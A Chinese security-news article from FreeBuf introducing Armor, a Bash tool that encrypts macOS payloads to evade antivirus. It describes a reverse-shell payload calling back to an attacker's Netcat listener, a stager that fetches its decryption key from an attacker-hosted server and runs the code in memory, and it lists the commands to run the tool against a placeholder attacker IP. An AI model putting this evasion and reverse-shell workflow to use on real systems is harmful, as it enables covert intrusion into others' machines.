freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Armor:一款功能强大的macOS Payload加密工具,可绕过大部分AV
2018-12-14 15:00:58

前言

今天给大家介绍的是一款名叫Armor的macOS Payload加密工具,Armor是一个功能强大的Bash脚本,通过它来创建的加密macOS Payload能够绕过反病毒扫描工具。

Armor

Armor介绍

Armor可以直接配合NetcatPayload一起使用,Netcat监听器的目标端口为4444,读取了“payload.txt”文件之后,我们会看到文件内容包含了Bash代码,执行之后,将会在目标macOS系统和攻击者的Netcat监听器之间建立一条TCP连接。Armor可以用来对Bash脚本的代码进行加密,Ncat可以用来在攻击者的服务器端托管解密密钥。当Stager在目标macOS系统上执行之后,bash代码会被解密并执行,整个过程不会在磁盘中存储任何数据。接下来,当解密密钥被使用之后,Ncat会终止监听器的运行。当Netcat链接建立成功之后,攻击者就可以获取到目标macOS系统的远程访问权了。

当然了,很多同学会认为对macOS Payload进行加密纯属多余,因为这种特殊的Bash脚本本来就能够绕过反病毒引擎。。但是我们这里只是举个例子,因为同等程度地代码混淆和加密还可以应用到很多复杂的Python、Ruby和Shell脚本身上。

工具安装

Armor使用了LibreSSL来加密输入的文件,并创建SSL证书。如果你的设备上没有安装LibreSSL的话,Armor会自动帮你安装它。这个功能的相关代码可以在armor.sh文件中找到。除了LibreSSL之外,依赖组件还包括Ncat在内,在Kali上大家可以使用下列命令完成安装:

$apt-get update && apt-get install nmap

Armor工具的代码克隆以及执行命令如下:

git clone https://github.com/tokyoneon/Armor

cd Armor/

chmod +x armor.sh

./armor.sh /path/to/payload.txt 1.2.3.4 443

其中,1.2.3.4是攻击者的IP地址,解密密钥就托管在这个服务器上,它可以是一个本地IP或者VPS服务器,443为服务器端口号,大家可以根据自己的需要来自行定义。

项目地址

Armor:【GitHub传送门

* 参考来源:Armor,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

# Armor # macOS Payload
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者